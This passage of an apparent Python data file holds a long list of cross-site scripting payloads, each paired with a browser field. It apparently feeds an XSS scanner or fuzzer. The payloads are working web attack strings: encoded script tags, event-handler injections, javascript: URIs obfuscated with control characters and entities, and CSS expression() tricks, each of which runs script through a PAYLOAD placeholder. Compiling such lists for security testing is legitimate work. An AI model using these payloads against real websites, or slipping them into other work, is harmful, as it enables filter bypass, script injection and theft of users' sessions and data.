          'browser':"""[Not Info]"""},
        { 'payload':'''%22%20onmouseover=javascript:alert(PAYLOAD)%20%22''',
     	  'browser':"""[Not Info]"""},
        { 'payload':'''%22/%3E%3Cmeta%20http-equiv=refresh%20content=0;javascript:alert(PAYLOAD);>''',
	      'browser':"""[Not Info]"""},
        { 'payload':'''%22%3E%3Cscript%3Ealert(PAYLOAD)%3B%3C%2Fscript%3E''',
	      'browser':"""[Not Info]"""},
        { 'payload':'''&#34;&#62;<h1/onmouseover='%0061lert(PAYLOAD)'>%00''',
	      'browser':"""[Not Info]"""},
        { 'payload':'''&#34;&#62;<svg><style>{-o-link-source&colon;"<body/onload=confirm(PAYLOAD)>"''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''%3Cform%20name%3D%22body%22%20onmouseover%3D%22alert(PAYLOAD)%22%20style%3D%22height%3A800px%22%3E%3Cfieldset%20name%3D%22attributes%22%3E%3Cform%3E%3C%2Fform%3E%3Cform%20name%3D%22parentNode%22%3E%3Cimg%20id%3D%22attributes%22%3E%3C%2Fform%3E%3C%2Ffieldset%3E%3C%2Fform%3E''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''%3Cform%20onmouseover%3Dalert(PAYLOAD)%3E%3Cinput%20name%3Dattributes%3E''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''%3Cimg%20name%3DgetElementsByTagName%20src%3D1%20%20onerror%3Dalert(PAYLOAD)%3E''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''%3cimg onerror=alert(PAYLOAD) src=a%3e''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''"'`><%3Cimg src=xxx:x onerror=javascript:alert(PAYLOAD)>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''%3Cscript%3Ealert(PAYLOAD)%3B%3C%2Fscript%3E''',
		  'browser':"""[Not Info]"""},
        { 'payload':''''`"><%3Cscript>javascript:alert(PAYLOAD)</script>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''%3Cscript>javascript:alert(PAYLOAD)</script>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''"'`>Y<div style="font-family:'foo'%3Bx:expression(javascript:alert(PAYLOAD);/*';">Z''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''"'`>Y<div style="font-family:'foo'%7Dx:expression(javascript:alert(PAYLOAD);/*';">Z>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''Y<div style="x:%00expression(javascript:alert(PAYLOAD)">Z''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''Y<div style="x:%09expression(javascript:alert(PAYLOAD)">Z''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''Y<div style="x:%0Aexpression(javascript:alert(PAYLOAD)">Z''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''Y<div style="x:%0Bexpression(javascript:alert(PAYLOAD)">Z''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''Y<div style="x:%0Cexpression(javascript:alert(PAYLOAD)">Z''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''Y<div style="x:%0Dexpression(javascript:alert(PAYLOAD)">Z''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''Y<div style="x:%20expression(javascript:alert(PAYLOAD)">Z''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''Y<div style="x%3Aexpression(javascript:alert(PAYLOAD)">Z''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''Y<div style="x:%C2%A0expression(javascript:alert(PAYLOAD)">Z''',
          'browser':"""[Not Info]"""},
        { 'payload':'''Y<div style="x:%E2%80%80expression(javascript:alert(PAYLOAD)">Z''',
          'browser':"""[Not Info]"""},
        { 'payload':'''Y<div style="x:%E2%80%81expression(javascript:alert(PAYLOAD)">Z''',
          'browser':"""[Not Info]"""},
        { 'payload':'''Y<div style="x:%E2%80%82expression(javascript:alert(PAYLOAD)">Z''',
          'browser':"""[Not Info]"""},
        { 'payload':'''Y<div style="x:%E2%80%83expression(javascript:alert(PAYLOAD)">Z''',
          'browser':"""[Not Info]"""},
        { 'payload':'''Y<div style="x:%E2%80%84expression(javascript:alert(PAYLOAD)">Z''',
          'browser':"""[Not Info]"""},
        { 'payload':'''Y<div style="x:%E2%80%85expression(javascript:alert(PAYLOAD)">Z''',
          'browser':"""[Not Info]"""},
        { 'payload':'''Y<div style="x:%E2%80%86expression(javascript:alert(PAYLOAD)">Z''',
          'browser':"""[Not Info]"""},
        { 'payload':'''Y<div style="x:%E2%80%87expression(javascript:alert(PAYLOAD)">Z''',
          'browser':"""[Not Info]"""},
        { 'payload':'''Y<div style="x:%E2%80%88expression(javascript:alert(PAYLOAD)">Z''',
          'browser':"""[Not Info]"""},
        { 'payload':'''Y<div style="x:%E2%80%89expression(javascript:alert(PAYLOAD)">Z''',
          'browser':"""[Not Info]"""},
        { 'payload':'''Y<div style="x:%E2%80%8Aexpression(javascript:alert(PAYLOAD)">Z''',
          'browser':"""[Not Info]"""},
        { 'payload':'''Y<div style="x:%E2%80%8Bexpression(javascript:alert(PAYLOAD)">Z''',
          'browser':"""[Not Info]"""},
        { 'payload':'''Y<div style="x:%E3%80%80expression(javascript:alert(PAYLOAD)">Z''',
          'browser':"""[Not Info]"""},
        { 'payload':'''Y<div style="x:%EF%BB%BFexpression(javascript:alert(PAYLOAD)">Z''',
          'browser':"""[Not Info]"""},
        { 'payload':'''Y<div style="x:exp%00ression(javascript:alert(PAYLOAD)">Z''',
          'browser':"""[Not Info]"""},
        { 'payload':'''Y<div style="x:exp%5Cression(javascript:alert(PAYLOAD)">Z''',
          'browser':"""[Not Info]"""},
        { 'payload':'''Y<div style="x:expression%00(javascript:alert(PAYLOAD)">Z''',
          'browser':"""[Not Info]"""},
        { 'payload':'''Y<div style="x:expression%5C(javascript:alert(PAYLOAD)">Z''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<!a foo=x=`y><img alt="`><img src=x:x onerror=alert(PAYLOAD)//">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<?a foo=x=`y><img alt="`><img src=x:x onerror=alert(PAYLOAD)//">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<a href="%00javascript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<a href="%01javascript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<a href="%02javascript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<a href="%03javascript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<a href="%04javascript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<a href="%05javascript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<a href="%06javascript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<a href="%07javascript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<a href="%08javascript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<a href="%09javascript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<a href="%0Ajavascript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<a href="%0Bjavascript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<a href="%0Cjavascript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<a href="%0Djavascript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<a href="%0Ejavascript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<a href="%0Fjavascript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<a href="%10javascript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<a href="%11javascript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<a href="123" id=x>kcf</a><script>x='javascript:alert(PAYLOAD)'//Y!;</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<a href="123" id=x>Y</a><script>x='javascript:alert(PAYLOAD)';</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<a href="%20javascript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=alert(PAYLOAD)></a>">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(PAYLOAD)></a>">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<a href="jav&#65ascript:javascript:alert(PAYLOAD)">Y</a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<a href="jav&#97ascript:javascript:alert(PAYLOAD)">Y1</a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(PAYLOAD)>Y</a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<a href="javas%00cript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<a href="javas%01cript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<a href="javas%02cript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<a href="javas%03cript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<a href="javas%04cript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<a href="javas%05cript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<a href="javas%06cript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<a href="javas%07cript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<a href="javas%08cript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<a href="javas%09cript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<a href="javas%0Acript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<a href="javas%0Bcript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<a href="javas%0Ccript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<a href="javas%0Dcript:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<a/href="javascript:&#13; javascript:prompt(PAYLOAD)"><input type="X">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<a href="javascript%3A:javascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<a href="javascript%3Ajavascript:alert(PAYLOAD)" id="fuzzelement1">Y</a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<a href="javascript#alert(PAYLOAD);">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<a href="javascript:alert(PAYLOAD)">Y</a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<a href="jAvAsCrIpT&colon;alert&lpar;PAYLOAD&rpar;">Y</a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(PAYLOAD)&NewLine;>X</a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<a href=x onerror=alert(PAYLOAD)>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''</a onmousemove="alert(PAYLOAD)">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''</a onmousemove=alert(PAYLOAD)>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<a onmouseover=(alert(PAYLOAD))>Y</a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<applet onerror applet onerror="javascript:javascript:alert(PAYLOAD)"></applet onerror>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<applet onError applet onError="javascript:javascript:alert(PAYLOAD)"></applet onError>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(PAYLOAD)"></applet onreadystatechange>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(PAYLOAD)"></applet onReadyStateChange>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<article xmlns="><img src=x onerror=alert(PAYLOAD)"></article>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<article xmlns="x:img src=x onerror=alert(PAYLOAD) ">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<a style="behavior:url(#Zault#AnchorClick);" folder="javascript:alert(PAYLOAD)">Y</a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<a style="behavior:url(#Zault#AnchorClick);" folder="javascript:javascript:alert(PAYLOAD)">Y</a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<a style="-o-link:'javascript:alert(PAYLOAD)';-o-link-source:current">Y</a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<a style="-o-link:'javascript:javascript:alert(PAYLOAD)';-o-link-source:current">Y''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(PAYLOAD);">Y</a></a><a href="javascript:alert(PAYLOAD)">Y</a>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(PAYLOAD);">Y</a></a><a href="javascript:javascript:alert(PAYLOAD)">Y</a><style>*[{}@import'%25(css)s?]</style>X''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<audio src=1 href=1 onerror="javascript:alert(PAYLOAD)"></audio>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<audio src=1 onerror=alert(PAYLOAD)>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<BASE HREF="javascript:alert(PAYLOAD);//">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<BASE HREF="javascript:alert('PAYLOAD');//">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<BASE HREF="javascript:javascript:alert(PAYLOAD);//">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<bgsound onpropertychange=alert(PAYLOAD)>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(PAYLOAD)"></bgsound onPropertyChange>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<BGSOUND SRC="javascript:alert(PAYLOAD);">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<BGSOUND SRC="javascript:alert('PAYLOAD');">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<BGSOUND SRC="javascript:javascript:alert(PAYLOAD);">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<b id="id1" x=begin0x2924end >`'"></b><script>if (!/begin.end/.Y(document.getElementById('id1').getAttribute('x'))) { alert(PAYLOAD);}</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<b id="id1" x=begin0x9fa0end >`'"></b><script>if (!/begin.end/.Y(document.getElementById('id1').getAttribute('x'))) { alert(PAYLOAD);}</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<BODY BACKGROUND="javascript:alert(PAYLOAD)">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<BODY BACKGROUND="javascript:alert('PAYLOAD')">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<body> §iframe onload=confirm(/PAYLOAD/)> <img src=x:x onerror="innerHTML=previousSibling.nodeValue.replace('§','<')"> </body>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<body onactivate=alert(PAYLOAD)>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<body onbeforeactivate=alert(PAYLOAD)>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<body onbeforeunload body onbeforeunload="javascript:javascript:alert(PAYLOAD)"></body onbeforeunload>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(PAYLOAD)"></body onBeforeUnload>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<body onblur body onblur="javascript:javascript:alert(PAYLOAD)"></body onblur>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<body onfocus body onfocus="javascript:javascript:alert(PAYLOAD)"></body onfocus>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<body onFocus body onFocus="javascript:javascript:alert(PAYLOAD)"></body onFocus>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<body onfocusin=alert(PAYLOAD)>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<body oninput=alert(PAYLOAD)><input autofocus>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<body oninput=javascript:alert(PAYLOAD)><input autofocus>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<body oninput=prompt(PAYLOAD)><input autofocus>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<body onkeydown body onkeydown="javascript:javascript:alert(PAYLOAD)"></body onkeydown>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<body onkeyup body onkeyup="javascript:javascript:alert(PAYLOAD)"></body onkeyup>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''\"><body onload=\"PAYLOAD\">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''\\\'><body onload=\\\'PAYLOAD\\\'>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<body/onload=<!-->&#10alert(PAYLOAD)>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<body onload="alert(PAYLOAD);">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<body onload="alert(PAYLOAD)">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<BODY ONLOAD=alert(PAYLOAD)>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<BODY ONLOAD=alert('PAYLOAD')>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<body onload body onload="javascript:javascript:alert(PAYLOAD)"></body onload>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<body onLoad body onLoad="javascript:javascript:alert(PAYLOAD)"></body onLoad>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<BODY ONLOAD=javascript:alert(PAYLOAD)>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<BODY ONLOAD=javascript:javascript:alert(PAYLOAD)>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''"><body onload="PAYLOAD">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''\'><body onload=\'PAYLOAD\'>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<body onMouseEnter body onMouseEnter="javascript:javascript:alert(PAYLOAD)"></body onMouseEnter>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<body onMouseMove body onMouseMove="javascript:javascript:alert(PAYLOAD)"></body onMouseMove>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<body onMouseOver body onMouseOver="javascript:javascript:alert(PAYLOAD)"></body onMouseOver>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<body onpagehide body onpagehide="javascript:javascript:alert(PAYLOAD)"></body onpagehide>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<body onPageHide body onPageHide="javascript:javascript:alert(PAYLOAD)"></body onPageHide>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<body onPageShow body onPageShow="javascript:javascript:alert(PAYLOAD)"></body onPageShow>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<body onPopState body onPopState="javascript:javascript:alert(PAYLOAD)"></body onPopState>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<body onPropertyChange body onPropertyChange="javascript:javascript:alert(PAYLOAD)"></body onPropertyChange>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<body onResize body onResize="javascript:javascript:alert(PAYLOAD)"></body onResize>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<body onscroll=alert(PAYLOAD)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<body onscroll=alert(PAYLOAD)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<body onscroll=alert(PAYLOAD)><br><br>...<br><input autofocus>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<body onscroll=javascript:alert(PAYLOAD)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<body onscroll=javascript:alert(PAYLOAD)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<body onscroll=prompt(PAYLOAD)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<body onunload body onunload="javascript:javascript:alert(PAYLOAD)"></body onunload>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<body onUnload body onUnload="javascript:javascript:alert(PAYLOAD)"></body onUnload>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<button/onclick=alert(PAYLOAD) >Y</button>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<comment><img src="</comment><img src=x onerror=alert(PAYLOAD)//">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<comment><img src="</comment><img src=x onerror=alert(PAYLOAD))//">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<comment><img src="</comment><img src=x onerror=javascript:alert(PAYLOAD))//">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<comment><img src="</comment><img src=x onerror=prompt(PAYLOAD)//">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<div class="foo1">Y</div> <script>document.getElementsByClassName('foo1')[0]?alert(PAYLOAD):0</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<div id=d><x xmlns="><iframe onload=alert(PAYLOAD)"></div> <script>d.innerHTML=d.innerHTML</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<div id=d><x xmlns="><iframe onload=javascript:alert(PAYLOAD)"></div> <script>d.innerHTML=d.innerHTML</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#Zault#time2"> <t:set attributeName="innerHTML" targetElement="x" to="<img&#11;src=x:x&#11;onerror&#11;=javascript:alert(PAYLOAD)>">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<div onmouseover="alert(PAYLOAD);">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<div/onmouseover='alert(PAYLOAD)'> style="x:">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<div onmouseover='alert&lpar;PAYLOAD&rpar;'>DIV</div>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<DIV STYLE="background-image: url(&#1;javascript:alert(PAYLOAD))">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<DIV STYLE="background-image: url(&#1;javascript:alert('PAYLOAD'))">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<div style="background-image: url(javascript:alert(PAYLOAD););">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<DIV STYLE="background-image: url(javascript:alert(PAYLOAD))">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<DIV STYLE="background-image: url(javascript:alert('PAYLOAD'))">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<DIV STYLE="background-image: url(javascript:javascript:alert(PAYLOAD))">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<div style="color:red'{} x:expression(alert(PAYLOAD))">.</div>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<div style="Y:expression(alert(PAYLOAD))'"></div>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<div style="Y:expression(alert(PAYLOAD))"></div>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<div style="Y:expression(alert(PAYLOAD))\"></div>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<div style="Y:expression(alert(PAYLOAD))">Y/div>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<div style="list-style:url(http://foo.f)\20url(javascript:alert(PAYLOAD));">X</div>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(PAYLOAD));">X''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<div  style="position:absolute;top:0;left:0;width:100%25;height:100%25"  onmouseover="prompt(PAYLOAD)" onclick="alert(PAYLOAD)">x</button>​''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<div style="position:absolute;top:0;left:0;width:100%25;height:100%25" onmouseover="prompt(PAYLOAD)" onclick="alert(PAYLOAD)">x</button>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<div style=width:1px;filter:glow onfilterchange=alert(PAYLOAD)>x</div>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<div style=width:1px;filter:glow onfilterchange=javascript:alert(PAYLOAD)>x''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<div style=width:1px;filter:glow onfilterchange=prompt(PAYLOAD)>x</div>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<div style="width: expression(alert(PAYLOAD););">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<DIV STYLE="width: expression(alert(PAYLOAD));">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<DIV STYLE="width: expression(alert('PAYLOAD'));">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<div/style="width:expression(confirm(PAYLOAD))">X</div>''',
          'browser':"""[IE7]"""},
        { 'payload':'''<DIV STYLE="width:expression(javascript:alert(PAYLOAD));">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''%E0<body onload=alert(PAYLOAD)>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<embed code=javascript:javascript:alert(PAYLOAD);></embed>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<embed src="javascript:alert(PAYLOAD)">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<embed src=javascript:alert(PAYLOAD)>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<!ENTITY x "&#x3C;html:img&#x20;src='x'&#x20;xmlns:html='http://www.w3.org/1999/xhtml'&#x20;onerror='alert(PAYLOAD)'/&#x3E;">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<event-source src="%25(event)s" onload="javascript:alert(PAYLOAD)">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<event-source src=javascript:alert(PAYLOAD)>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''exp/*<A STYLE='no\Y:noY("*//*");Y:&#101;x&#x2F;*Y*//*/*/pression(alert(PAYLOAD))'>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''exp/*<A STYLE='no\Y:noY("*//*");Y:ex/*Y*//*/*/pression(alert("PAYLOAD"))'>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''</font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(PAYLOAD)>'</font>/</style>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''foo%00<script>alert(PAYLOAD)</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<! foo="><script>alert(PAYLOAD)</script>">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<? foo="><script>alert(PAYLOAD)</script>">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''</ foo="><script>alert(PAYLOAD)</script>">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<! foo="><script>javascript:alert(PAYLOAD)</script>">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<? foo="><script>javascript:alert(PAYLOAD)</script>">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''</ foo="><script>javascript:alert(PAYLOAD)</script>">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<? foo="><x foo='?><script>alert(PAYLOAD)</script>'>">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<%25 foo><x foo="%25><script>alert(PAYLOAD)</script>">''',
